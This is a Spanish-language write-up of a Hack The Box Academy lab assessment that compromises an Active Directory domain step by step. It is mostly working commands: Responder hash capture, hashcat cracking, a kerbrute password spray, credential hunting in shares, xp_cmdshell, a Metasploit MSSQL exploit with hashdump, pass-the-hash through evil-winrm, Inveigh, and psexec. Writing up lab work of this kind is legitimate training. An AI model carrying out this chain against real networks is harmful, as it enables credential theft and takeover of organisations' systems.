HTB Academy Active Directory Skills Assessment Part II
Este write-up trata del último ejercicio para el módulo de Active Directory de Hack The Box Academy. Nos dan acceso a una máquina Parrot que comparte enrutador con el entorno a vulnerar.
Vamos a analizar el entorno:
nmap -T4 -A 172.16.6.0/23 -oN nmap_scan.txt &
responder -I ens24&
Encontramos:
-
Domain Controller (DC) with IP address: 172.16.7.3
-
MS01 host with IP address: 172.16.7.50
-
SQL01 server with IP address: 172.16.7.60
También, gracias al Responder, obtenemos un hash NTLMv2 de un usuario para MS01.
hashcat -m 5600 hash_ntlmv2 /usr/share/wordlists/rockyou.txt
Con estas credenciales, vamos a rastrear usuarios válidos con el servicio smb levantado en MS01.
crackmapexec smb 172.16.7.50 -u '' -p '' --users
Encontramos varios usuarios válidos, los introducimos en un .txt y con un diccionario de las 1000 contraseñas más comunes, hacemos un password spray attack:
kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 users_valid.txt password.txt
Con las credenciales obtenidas ahora, tenemos acceso de lectura a los directorios compartidos. Hay más credenciales en:
smbmap -u '' -p '' -R Department Shares -H 172.16.7.3 -A web.config -q
Esta nueva cuenta tiene activado el privilegio ‘SeImpersonatePrivilege’.
mssqlclient.py INLANEFREIGHT/user@172.16.7.60
xp_cmdshell "whoami /priv"
La forma más rápida de explotar esta vulnerabilidad y acceder a SQL01 es con metasploit.
msfconsole -q
search mssql_payload
use 0
(...)
exploit
Si a este exploit le añadimos el meterpreter como payload, podremos realizar un hashdump que nos dará acceso a credenciales para MS01.
evil-winrm -i 172.16.7.50 -u Administrator -H bdaffbf (...)
Una vez en MS01, podemos utilizar Inveigh.exe, que tiene la misma función que Responder pero para Windows.
Evil-WinRM* PS C:\Users\Administrator\Desktop> upload Inveigh.exe
Info: Uploading Inveigh.exe to C:\Users\Administrator\Desktop\Inveigh.exe
Esto nos devolverá otro hash NTLMv2. Una vez pasado por hashcat, sólo será necesario utilizar psexec.py
para acceder a DC01.